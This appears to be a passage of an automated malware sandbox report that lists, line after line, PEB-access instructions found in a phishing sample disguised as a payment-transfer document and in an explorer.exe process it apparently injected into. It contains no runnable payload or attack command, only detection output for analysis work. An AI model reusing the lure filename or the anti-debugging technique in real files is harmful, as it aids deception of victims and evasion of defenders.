          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01074257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0106A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01018E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01028EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
